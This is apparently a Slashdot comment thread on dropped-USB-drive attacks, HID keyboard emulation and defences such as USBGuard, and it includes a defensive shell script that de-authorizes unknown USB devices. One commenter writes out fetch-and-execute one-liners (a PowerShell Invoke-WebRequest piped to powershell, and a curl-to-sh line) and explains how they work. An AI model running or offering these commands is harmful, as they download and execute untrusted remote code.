The statement of USB drives at trade shows as good? Really? I'd only trust one if it was handed directly to me by a vendor rep. At a DoD-focused conference there was a basket of "free USB thumbsticks", a couple hundred of them (with auto-installed virus and backdoor on them, of course). Took DoD a while to take care of that. Some departments even super-glued covers on extra USB ports to prevent reinfection (no joke).
My personal computer is immune as it has only 2 serial RS-232 ports and a parallel port. You should try dropping some 5.25" floppies in order to test my security levels. Check whether your virus can run along with my DiskOS within 640 KB!
Sent as ripples into the electromagnetic field. No single photon has been harmed in the process.
Actually mine was treated as a Pro Micro. I think the Nano uses the older chip, which only works as a USB host, not a USB gadget.
Seriously... will people ever learn?
There are a few characters missing from the code I posted. I don't have a Windows machine handy to test with at the moment, in order to catch any errors. It would actually be more like:
Win+R powershell -command 'Invoke-WebRequest http...
Invoke-WebRequest downloads a URL, like a browser would, but then we use the pipe character | to send the content of that URL to powershell. Powershell is kind of like cmd.exe, but more powerful. If you do Win+R cmd.exe you'll see what looks like a DOS prompt, where you can type commands. Powershell is that on steroids (and on crack).
Piping them together, you get "retrieve commands from http://tinyurl.com/jfjdhd and run them using powershell".
The Linux/Unix/Mac version is similar:
curl http://tinyurl.com/hacker | sh
Curl gets whatever is at that URL and sends it to "sh". Sh, the shell, is the "DOS prompt" of Unix, and runs whatever commands curl got from the internet.
The researchers dropped 297 USB flash drives on a university campus
Come on. Of course students are going to pick them up.
"a USB stick given away at a trade show is automatically good." Guffaw!
2011 called, they want their Bruce Schneier article back.
Not that it's not a good article, but come on!
That was some epically beautiful nerdiness right there.
How many have seen this error on boot over the years?
keyboard not detected - press F1 to continue.
or one of those http://www.pcworld.com/article/2896732/dont-trust-other-peoples-usb-flash-drives-they-could-fry-your-laptop.html
My Linux doesn't run anything from a USB stick, doesn't even mount it unless I tell it to do so... :P
The biggest problem isn't automatic execution. The biggest problem here is that the execution is allowed to do whatever the hell it wants, with no complaints from the OS. The reason for this is simple; the overwhelming majority of all windows users log in with full admin privileges by default. Hell more users take the step to disable the password for their (full admin) user than do to take the step to set up a non-admin user for day-to-day use.
If these users were logging in instead as a non-privileged user, then the overwhelming majority of the malware would be neutered to futility.
I have Linux boxes...
I plug it in and format it with ext4. Never had a problem.
Excuse me, but please get off my Pennisetum Clandestinum, eh!
Only if their computer is running Microsoft Windows on Intel hardware. Why is it 'computers' when Windows is involved but when a bug is discovered in say for instance Apple iOS or Linux, there is no problem mentioning the underlying Operating System and Platform - Microsoft Windows - the OS that still can't tell the difference between OPEN and RUN. It doesn't take a scientist to figure this out.
Who remembers the infamous "No keyboard detected. Press F1 to continue.." error message?
'The tyrant will always find pretext for his tyranny.' - Aesop's Fables
lsblk
mount /dev/sdc1 /mnt/dummy
ls -l /mnt/dummy
Slashdot, fix the reply notifications... You won't get away with it...
All of that can be done in software. The only reason we are whining about it is that the system with the problems is closed source and the owners of the system are not open to suggestions.
I meant in this context or case. I thought that was obvious, or are you just joking around?
Table-ized A.I.
No, I'm a Hillary. I have no concern for anybody my husband is screwing, or who reads my email. And yes, I am nearly a Republican.
Well, my motherboard has a button to enter UEFI and jumpers for adding a button you can hit without opening the case. Maybe there should be an OK button as well for new USB devices.
Okay. Perhaps we can rework the original claim to be:
"People are stupid to not know by now that MS is like Ferengi rather than Vulcans."
Table-ized A.I.
So will any USB stick just automatically run a program? I'm on Mac OS 10.9.5; will it really just run an application?
Who mounts USB without a no execute flag?
people execute ${RANDOM JAVASCRIPT} (and worse!) from the intarwebs. And our overlords tell us that it's good (quoth the Slashdot:
"There may be more comments in this discussion. Without JavaScript enabled, you might want to turn on Classic Discussion System in your preferences instead." -- and this is one of the extremely positive outliers!).
We are doomed. What to do?
And even users who might on their own have made better decisions then fall victim to network effects. In a world where everybody exchanges information on USB drives, you simply cannot be ‘that guy’ who throws a fit when someone plugs a USB drive in his computer.
So we all happily plug USB drives into our computers, because we have to if we want to eat tomorrow. Even though it's impossible to tell from the outside if it's a USB drive or a USB hub connected to a decoy drive and a remote controlled keyboard.
...going from port to port?
woah... there should be even more suspect...
http://www.scmagazine.com/ibm-distributed-infected-usb-drives-at-conference/article/170862/
Donald 'Duck' Dunn: We had a band powerful enough to turn goat piss into gasoline.
I do this too. It doesn't do anything to my computers.
Disclaimer: I use linux, suckers...
I didn't, do you have a source? That seems like something that'll be right up my alley
The logical next step on the evolution of Etherkillers.
It's actually easier than that. You plug the USB device in, the computer asks the device what it is and which drivers to use. The device replies "I am malware, please download my drivers from xyz or install them from this file I contain".
Universal plug and play has been a serious bug for quite a while.
It's not people who are stupid it's operating system designers. Autoplay should not be.
hopefully you added a nice goatse image on the SD. Can't be too nice.
https://www.grahamcluley.com/2...
The video is somewhat anti-climactic, but there ya go.
Another solution: if a keyboard is already plugged in, prompt for a warning. If a keyboard is not plugged in, accept it.
Extra countermeasures for the paranoid.
If a keyboard is not plugged in but a mouse is present, Yes/No dialog box. If neither is plugged in, accept either.
I get annoyed when people don't put a readme.txt in the root.
Hm. Honestly, it had never occurred to me to do this, but that's a good idea. Back in the day of floppies, I'd regularly put contact info on the label in case I lost it, but I never really translated it to USB sticks. I'm more prone to breaking them than losing them, so maybe it doesn't matter anyway, but it's still a good suggestion.
The Quirkz Handbook of Self-Improvement for People Who Are Already Pretty Okay
Perhaps the computer is intended not to have a keyboard and now you put one in, no warning! There is a reason for the 'Press F1' warning in your BIOS.
So if you go the warning way, you should do it any time you plug it in and unplug it AND block the PC until some action has been taken or until it is restored to the old state, e.g. the device is removed.
That would mean if you plug in a new keyboard, IT needs to come and enter their password or give the users the authority to do so themselves.
The majority of companies have all USB ports active, so there is that as well.
Don't fight for your country, if your country does not fight for you.
Some of us don't allow autorun, and so we're not worried about something executed on load.
On BSD at least, you can lock the install to a specific USB keyboard ID, so then it won't accept a random HID.
Excuse me, but please get off my Pennisetum Clandestinum, eh!
I meant in this context or case. I thought that was obvious, or are you just joking around?
Sometimes even I can't tell. ;)
Just cruising through this digital world at 33 1/3 rpm...
Oh, that's a good solution.
"First they came for the slanderers and i said nothing."
Those who use a real computer can run USBGuard: https://dkopecek.github.io/usb...
It provides a very simple way to control the devices that are allowed to hook to your machine via a kernel security feature that has been there for many a year: https://www.kernel.org/doc/Doc...
Excuse me, but please get off my Pennisetum Clandestinum, eh!
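As an added example (not USBGuard's own code or configuration), a small POSIX shell policy built on the same kernel attribute the post points to: it de-authorizes new devices by default, then authorizes only an allow-listed keyboard/mouse or a device whose interfaces are all mass storage, so a "thumb drive" that also presents a HID interface stays unauthorized. The vendor:product IDs are constructed placeholders; applying verdicts needs root and a Linux sysfs.

```shell
#!/bin/sh
# Added example, not from USBGuard or the kernel docs: allow-list policy for
# USB devices using the per-device "authorized" attribute in sysfs.

# Constructed allow-list, "vendor:product" in lowercase hex as lsusb shows it.
# Replace with the IDs of your own keyboard and mouse (placeholders here).
ALLOWED="046d:c52b 413c:2113"

STORAGE_CLASS=08   # bInterfaceClass 08 = Mass Storage
# A HID interface (03) on something sold as a flash drive is the red flag
# discussed in this thread; anything that is not pure storage is blocked.

# decide VENDOR PRODUCT "CLASS CLASS ..." -> prints allow|block
decide() {
  vendor=$1; product=$2; classes=$3
  for id in $ALLOWED; do
    [ "$id" = "$vendor:$product" ] && { echo allow; return 0; }
  done
  # Unknown device with no readable interfaces: nothing to inspect, block.
  [ -n "$classes" ] || { echo block; return 0; }
  for c in $classes; do
    [ "$c" = "$STORAGE_CLASS" ] || { echo block; return 0; }
  done
  echo allow
}

# lockdown: make every root hub leave newly plugged devices de-authorized
# (they enumerate but get no driver) until a verdict authorizes them.
lockdown() {
  for hub in /sys/bus/usb/devices/usb*; do
    echo 0 > "$hub/authorized_default"
  done
}

# apply DEVPATH VERDICT: write the device's authorization bit (1 or 0).
apply() {
  case $2 in
    allow) echo 1 > "$1/authorized" ;;
    block) echo 0 > "$1/authorized" ;;
  esac
}

# scan: walk attached devices, gather their interface classes, decide,
# and apply the verdict when APPLY=1 is set in the environment.
scan() {
  for dev in /sys/bus/usb/devices/*-*; do
    [ -f "$dev/idVendor" ] || continue        # skip interface entries
    vendor=$(cat "$dev/idVendor"); product=$(cat "$dev/idProduct")
    classes=$(cat "$dev"/*:*/bInterfaceClass 2>/dev/null | tr '\n' ' ')
    verdict=$(decide "$vendor" "$product" "$classes")
    echo "$dev $vendor:$product [$classes] -> $verdict"
    [ "${APPLY:-0}" = 1 ] && apply "$dev" "$verdict"
  done
}
```

Run lockdown once at boot, then scan (with APPLY=1) from a udev add rule or a loop; a device that shows up as both 08 and 03 is exactly the hub-plus-keyboard decoy described elsewhere in the thread.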
How many have seen this error on boot over the years?
keyboard not detected - press F1 to continue.
It makes sense to me. Keyboard not detected.. plug in keyboard.. press F1 to keep booting.
That message always came up but it never hung the system for me; did this actually pose a problem on older hardware?
I keep an old laptop for this kind of thing. It doesn't have any useful data on it or a live network connection and it won't run Windows malware, so it's pretty low risk. My users know to bring drives they find to me, not plug them into their own hardware. I have not found any hostile programs but have made a couple people happy by returning their lost drives.
Because Microsoft at least used to act as if it were alone in the world, much like IBM before it. Back in the mid-70s, if you saw a reference to "computers" or "mainframes" you'd think about an IBM mainframe.
"When you have eliminated the unacceptable, whatever is left, however improbable, must be the truthiness" - Holmes
When the device is plugged in, have the OS show a random countdown between 10-60 seconds. While that dialog is active, the OS monitors the power-button. If the user taps the power-button at the right moment, that signifies confirmation and the mouse/keyboard is trusted.
If the power-button is pressed too late or too early, it's an error, the dialog goes away, and the user needs to unplug+replug to try again.
If the user already has a keyboard or mouse connected, they can bypass the dialog that way too.
If the power-button is not practical, another possibility is to use the *unplugging of the device* as a trigger, if the OS can remember the identity of the device.
Uni students are the dumbest people on planet earth. Especially with IT. It's not a valid test to use a university population as subjects.
Yes, but Vulcans are very logical and program all non-systems code in Haskell or Ada so they don't have bugs. In real life, the barrier between code and data is not well maintained, meaning specially crafted files can launch from exploits in thumbnailing or preview programs.
And a really nasty USB device might emulate a keyboard and monitor, use the keyboard to set up a second monitor, and run exploits just as well as if the hacker had access to the unlocked workstation.
It should be interesting what more can be done on the new USB-C connections that have USB and Thunderbolt, as they will have access to the PCI-e bus directly.
APK likes to ask for responses to the same things over and over. Maybe he just likes the responses?
When in college, I found someone's flash drive. It had been run over by a vehicle, so I got the email address from a resume and emailed them the file with a note about the hardware being destroyed. Never thought much about it, but this was 15+ years ago.
Is that true on a college campus though where people use the USB sticks for all their files?
If the USB port chipset is smart enough, it may communicate with the plugged-in devices in ways that are harmful - such as exploiting a bug in the USB chipset's firmware - before the non-firmware software can act on it.
This is where a "USB condom" comes in - while it is a single point of failure (its software can be buggy) it is a single, small thing that can be designed and built with security in mind from the get-go.
Knowledge is how to play a game, intelligence is how to win, wisdom is knowing what game to play.
This message predated USB for quite a while, and the old PS/2 ports are not hot pluggable. So it used to be see message... plug in keyboard... push reset* button.
*Remember those?
Firewire is (was?) similar since it had DMA access, so in theory a malicious firewire device could completely own the host if it was plugged in. Though in firewire's case, I never saw anything do that besides a few proofs of concept.
This kind of thing has been going on for a long long time... it's called sex.
Is that true on a college campus though where people use the USB sticks for all their files?
Yes, yes it is. But even if you ignore the stats themselves, ask yourself how juicy selfies end up on a USB stick:
Step 1: Take selfie with mobile phone.
Step 2a: Share selfie with friend. No USB stick required, in fact stupid amounts of effort involved.
Step 2b: Copy selfie to computer. No USB stick required.
Step 1b: Take selfie with camera. Wait what? Who has cameras these days? When has a juicy selfie ever been a high quality 20mpxl photo?
It just doesn't make sense that people would put juicy selfies on a USB stick these days and half the problem with being on campus is Universities not providing easy means of remote access and ability to easily print. UQ actually went through a little bit of a change a few years ago. With the introduction of Google Docs, the removal of the stupid arbitrary 100MB / month data cap on university accounts, and the ability to connect and print via wifi, USB sticks almost went away completely.
At least they went away to the point where the service centre no longer has a lost and found for USB sticks. Sidenote: This was a great source of free USB sticks while I was at uni. Go to the lost and found and say you lost your USB stick and the guy at the counter asks what does it look like and if you said something like the red one with Verbatim written on it, or the Sandisk one, or a yellow one with a company logo on it, you get a free USB stick (no selfies though).
I get annoyed when people don't put a readme.txt in the root.
Hm. Honestly, it had never occurred to me to do this, but that's a good idea. Back in the day of floppies, I'd regularly put contact info on the label in case I lost it, but I never really translated it to USB sticks. I'm more prone to breaking them than losing them, so maybe it doesn't matter anyway, but it's still a good suggestion.
Considering how much work I'm willing to put into getting someone their USB drive back, anything I can do to make it better for someone else.
My flash drives are always Portable Apps installations so it's:
Just another second banana
He he he, use a Raspberry or even an Arduino concoction to test your USBs! I have one in mind but still little chance to finally build it. Too late though, the USB I found is already lost and forgotten... unless it did manage to leave a payload. No way to give it back, it was a tourist's, seemingly, and a lot of effort. And yes, the THOUGHT did come to me but, alas! what CAN YOU DO? A found USB stick is good value overall to find! So eventually you dismiss the danger issue and hope for the best. This laptop seems to have all autoruns disabled and no way to activate them; autorun is indeed one of the best values but it usually does NOT work. What worries me more is NOT a found USB but an actual OEM IMITATION STICK with WIFI RADIO included. One of my branded USB sticks reported four gigabytes less than the actual size, which is enough to hold a full Raspberry NOOBS OS! Reformatting did not recover the space at all and still I am using it, STILL unsure whether I did notice some old game zip was no longer there. Unfortunately these comments provide no solution to the general problem beyond that of ABSTAIN.